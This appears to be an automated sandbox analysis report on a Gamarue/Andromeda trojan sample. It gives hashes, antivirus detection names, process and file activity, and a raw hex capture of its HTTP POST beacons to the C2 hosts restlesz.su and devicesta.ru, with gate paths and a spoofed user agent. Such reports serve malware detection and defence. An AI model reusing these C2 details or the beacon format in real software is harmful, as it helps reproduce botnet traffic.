Analysis Date: 2018-04-22 18:41:37
MD5: 64aabc259b14e2118a6a0314a1d537fd
SHA1: fbdbb3080ecd3d6ba3adcdaea4c2cde249e5421f

Static Details:

File type: PE32 executable (GUI) Intel 80386, for MS Windows
PE hash:
AV Arcabit (arcavir): Gen:Variant.Symmi.28546
AV Authentium: W32/Trojan.KYQA-2633
AV Grisoft (avg): Error Scanning File
AV Avira (antivir): TR/BAS.Samca.13317892
AV Alwil (avast): Bundpil-C [Trj]
AV Ad-Aware: Gen:Variant.Symmi.28546
AV BitDefender: Gen:Variant.Symmi.28546
AV BullGuard: Error Scanning File
AV ClamAV: Win.Trojan.Agent-1109687
AV Dr. Web: BackDoor.Andromeda.178
AV Emsisoft: Gen:Variant.Symmi.28546
AV MicroWorld (escan): Gen:Variant.Symmi.28546
AV CA (E-Trust Ino): Error Scanning File
AV Fortinet: W32/Wauchos.LB!tr
AV Frisk (f-prot): W32/Trojan2.OAPW
AV F-Secure: Trojan-Downloader:W32/Wauchos.F
AV Ikarus: Trojan-Downloader.Small
AV K7: Trojan ( 0001140e1 )
AV Kaspersky: Error Scanning File
AV MalwareBytes: Trojan.Email.Bot
AV Mcafee: W32/Worm-FKO!64AABC259B14
AV Microsoft Security Essentials: Worm:Win32/Gamarue.I
AV NANO: Trojan.Win32.Andromeda.cjgqby
AV NANO: Trojan.Win32.Andromeda.dpkxyv
AV Eset (nod32): Win32/TrojanDownloader.Wauchos.L
AV Padvish: Worm.Win32.Gamarue.SameMsiexec1
AV CAT (quickheal): Worm.Gamarue.A5
AV Rising: No Virus
AV 360 Safe: Trojan.Win32.Agent.FN
AV SUPERAntiSpyware: Trojan.Agent/Gen-FalComp
AV Symantec: Downloader.Dromedan
AV Trend Micro: WORM_GAMARUE.SMV
AV Twister: Trojan.3F06E5417E4C04E9
AV VirusBlokAda (vba32): SScope.Malware-Cryptor.Wauchos.2183
AV Windows Defender: Worm:Win32/Gamarue.F
AV Zillya!: Error Scanning File

Runtime Details:


Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\fbdbb3080ecd3d6ba3adcdaea4c2cde249e5421f.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\fbdbb3080ecd3d6ba3adcdaea4c2cde249e5421f.exe

Creates File: C:\Windows\SysWOW64\msiexec.exe

Process
↳ C:\Windows\SysWOW64\msiexec.exe

Creates Mutex: 3770066751
Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls
Creates File: C:\Users\Phil\AppData\Local\Temp\fbdbb3080ecd3d6ba3adcdaea4c2cde249e5421f.exe
Creates File: C:\ProgramData\Local Settings\Temp\ccweav.exe
Creates File: C:\Windows\SysWOW64\msiexec.exe
Creates File: C:\ProgramData\Local Settings\Temp\ccweav.exe

Network Details:


Raw Pcap (six HTTP POST requests: five to restlesz.su and one to devicesta.ru, each with an 80-byte body; the User-Agent header reads `Mozi1la/4.0`, with the digit 1 in place of the letter l)
0x00000000 (00000)   504f5354 202f6761 7465322e 70687020   POST /gate2.php 
0x00000010 (00016)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000020 (00032)   72657374 6c65737a 2e73750d 0a557365   restlesz.su..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 69316c61   r-Agent: Mozi1la
0x00000040 (00064)   2f342e30 0d0a436f 6e74656e 742d5479   /4.0..Content-Ty
0x00000050 (00080)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000060 (00096)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000070 (00112)   636f6465 640d0a43 6f6e7465 6e742d4c   coded..Content-L
0x00000080 (00128)   656e6774 683a2038 300d0a43 6f6e6e65   ength: 80..Conne
0x00000090 (00144)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x000000a0 (00160)   75707163 68433435 75315446 462b4a6d   upqchC45u1TFF+Jm
0x000000b0 (00176)   6e594b47 4977694c 71587779 4773436f   nYKGIwiLqXwyGsCo
0x000000c0 (00192)   41334f75 74314168 33486156 73516a34   A3Out1Ah3HaVsQj4
0x000000d0 (00208)   35594371 474b326c 58663250 76494d65   5YCqGK2lXf2PvIMe
0x000000e0 (00224)   744a337a 4d526f44 4c555139 35533438   tJ3zMRoDLUQ95S48
0x000000f0 (00240)                                         

0x00000000 (00000)   504f5354 202f3030 31316c64 722e7068   POST /0011ldr.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 486f7374   p HTTP/1.1..Host
0x00000020 (00032)   3a207265 73746c65 737a2e73 750d0a55   : restlesz.su..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a6931   ser-Agent: Mozi1
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038300d 0a436f6e   -Length: 80..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7158 77794773   JmnYKGIwiLqXwyGs
0x000000c0 (00192)   436f4133 4f757431 41683348 61567351   CoA3Out1Ah3HaVsQ
0x000000d0 (00208)   6a343559 4371474b 326c5866 32507649   j45YCqGK2lXf2PvI
0x000000e0 (00224)   4d65744a 337a4d52 6f444c55 51393553   MetJ3zMRoDLUQ95S
0x000000f0 (00240)   3438                                  48

0x00000000 (00000)   504f5354 202f3030 32326c64 722e7068   POST /0022ldr.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 486f7374   p HTTP/1.1..Host
0x00000020 (00032)   3a207265 73746c65 737a2e73 750d0a55   : restlesz.su..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a6931   ser-Agent: Mozi1
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038300d 0a436f6e   -Length: 80..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7158 77794773   JmnYKGIwiLqXwyGs
0x000000c0 (00192)   436f4133 4f757431 41683348 61567351   CoA3Out1Ah3HaVsQ
0x000000d0 (00208)   6a343559 4371474b 326c5866 32507649   j45YCqGK2lXf2PvI
0x000000e0 (00224)   4d65744a 337a4d52 6f444c55 51393553   MetJ3zMRoDLUQ95S
0x000000f0 (00240)   3438                                  48

0x00000000 (00000)   504f5354 202f3030 3034346c 64722e70   POST /00044ldr.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a486f73   hp HTTP/1.1..Hos
0x00000020 (00032)   743a2072 6573746c 65737a2e 73750d0a   t: restlesz.su..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   316c612f 342e300d 0a436f6e 74656e74   1la/4.0..Content
0x00000050 (00080)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000060 (00096)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203830 0d0a436f   t-Length: 80..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43343575 31544646   ...upqchC45u1TFF
0x000000b0 (00176)   2b4a6d6e 594b4749 77694c71 58777947   +JmnYKGIwiLqXwyG
0x000000c0 (00192)   73436f41 334f7574 31416833 48615673   sCoA3Out1Ah3HaVs
0x000000d0 (00208)   516a3435 59437147 4b326c58 66325076   Qj45YCqGK2lXf2Pv
0x000000e0 (00224)   494d6574 4a337a4d 526f444c 55513935   IMetJ3zMRoDLUQ95
0x000000f0 (00240)   533438                                S48

0x00000000 (00000)   504f5354 202f3030 3035356c 64722e70   POST /00055ldr.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a486f73   hp HTTP/1.1..Hos
0x00000020 (00032)   743a2072 6573746c 65737a2e 73750d0a   t: restlesz.su..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   316c612f 342e300d 0a436f6e 74656e74   1la/4.0..Content
0x00000050 (00080)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000060 (00096)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203830 0d0a436f   t-Length: 80..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43343575 31544646   ...upqchC45u1TFF
0x000000b0 (00176)   2b4a6d6e 594b4749 77694c71 58777947   +JmnYKGIwiLqXwyG
0x000000c0 (00192)   73436f41 334f7574 31416833 48615673   sCoA3Out1Ah3HaVs
0x000000d0 (00208)   516a3435 59437147 4b326c58 66325076   Qj45YCqGK2lXf2Pv
0x000000e0 (00224)   494d6574 4a337a4d 526f444c 55513935   IMetJ3zMRoDLUQ95
0x000000f0 (00240)   533438                                S48

0x00000000 (00000)   504f5354 202f6761 74653032 2e706870   POST /gate02.php
0x00000010 (00016)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000020 (00032)   20646576 69636573 74612e72 750d0a55    devicesta.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a6931   ser-Agent: Mozi1
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038300d 0a436f6e   -Length: 80..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7158 77794773   JmnYKGIwiLqXwyGs
0x000000c0 (00192)   436f4133 4f757431 41683348 61567351   CoA3Out1Ah3HaVsQ
0x000000d0 (00208)   6a343559 4371474b 326c5866 32507649   j45YCqGK2lXf2PvI
0x000000e0 (00224)   4d65744a 337a4d52 6f444c55 51393553   MetJ3zMRoDLUQ95S
0x000000f0 (00240)   343838                                488


Strings